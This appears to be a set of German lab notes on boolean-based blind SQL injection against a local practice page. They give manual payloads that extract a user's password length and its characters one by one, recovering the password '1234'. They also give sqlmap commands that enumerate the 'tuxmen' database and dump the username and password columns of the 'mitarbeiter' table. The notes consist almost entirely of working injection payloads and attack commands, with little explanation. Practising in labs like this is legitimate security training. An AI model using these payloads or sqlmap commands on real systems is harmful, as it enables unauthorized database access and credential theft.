⚠️ Hinweis: Hinter -- muss ein Leerzeichen stehen (-- ) – sonst wird der Kommentar nicht erkannt!
hans' AND LENGTH(password) < '10' -- hans' AND LENGTH(password) < '5' -- hans' AND LENGTH(password) = '4' -- ✅
hans' AND SUBSTRING(password,1,1) = '1' -- hans' AND SUBSTRING(password,2,1) = '2' -- hans' AND SUBSTRING(password,3,1) = '3' -- hans' AND SUBSTRING(password,4,1) = '4' -- ✅
hans' AND password = '1234' -- ✅
sqlmap -u http://localhost/sql-blind.php --data="username=hans" --technique=B --batch
sqlmap -u http://localhost/sql-blind.php --data="username=hans" \ -D tuxmen --tables --batch
sqlmap -u http://localhost/sql-blind.php --data="username=hans" \ -D tuxmen -T mitarbeiter --columns --batch
sqlmap -u http://localhost/sql-blind.php --data="username=hans" \ -D tuxmen -T mitarbeiter -C username,password --dump --technique=B --batch